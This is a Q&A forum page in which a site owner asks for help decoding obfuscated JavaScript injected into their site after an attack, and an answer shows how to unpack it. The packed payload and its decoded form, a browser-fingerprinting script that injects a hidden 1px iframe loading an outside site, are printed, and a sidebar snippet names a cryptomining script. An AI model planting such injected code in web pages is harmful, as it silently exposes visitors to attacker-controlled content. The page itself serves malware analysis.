JavaScript code injected into site: Can you help me decrypt it?

javascript malware
ARandomGenericShrub picture ARandomGenericShrub · Oct 14, 2011 · Viewed 16.6k times · Source

Recently I was the victim of a web attack, which seemed to take various PHP server vars, then forward them to an attackers website. (IPs of visitor/website, referrer, useragent etc, etc.) Then it would get the file it sent the URL request to, and echo() it to source.

I know you get MANY of these sort of requests (Mostly as poor man XSS attempts), but I would really appreciate some help here, as I don't have much experience with JS. It took me several hours of PHP unscrambling to figure at what it did, and after passing some dummy info, it returned this (which was being echoed into source)

<script type='text/javascript'>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height|width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|25u|msie|toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|500|asso|navigator|com|showthread|php|72291731'.split('|'),0,{}))

Thank you for your time and patience with this matter.

Answer

Christian picture Christian · Oct 14, 2011

Simply replace eval with alert.

It yields the following:

function MakeFrameEx(){
    element=document.getElementById('yahoo_api');
    if(!element){
        var el=document.createElement('iframe');
        document.body.appendChild(el);
        el.id='yahoo_api';
        el.style.width='1px';
        el.style.height='1px';
        el.style.display='none';
        el.src='http://asso.25u.com/showthread.php?t=72291731'
    }
}

var ua=navigator.userAgent.toLowerCase();

if(((ua.indexOf("msie")!=-1
    &&ua.indexOf("opera")==-1
    &&ua.indexOf("webtv")==-1))
    &&ua.indexOf("windows")!=-1)
{
    var t=setTimeout("MakeFrameEx()",500);
}

After doing the alert() CTRL+C the dialog to get the contents, then use a JS Beautifier to get some readable code.

Also note that for some browsers, like Firefox, there are plugins to do this automatically. Some browsers even does this automatically (MSIE).

Related questions

Site with a bitcoin miner script

I found some of my users visiting a site that seemed to have a Bitcoin mining JS script in its code: <script src = "hxxps://coin-hive.com/lib/coinhive.min.js"></script><script> var miner = …

Read More
Android App using Webview/javascript. what can be security concern?

I am creating an android web app using Webview and Javascript making addJavascriptInterface(true). My App will content data(html) that will be loaded from an external site. I worried about the cross-site-scripting XSS/security of my app as I …

Read More
Extract JavaScript from malicious PDF

I have a PDF file that I know for a fact contains a JavaScript script file that does something malicious, not really sure what at this point. I have successfully uncompressed the PDF file and gotten the plaintext JavaScript source …

Read More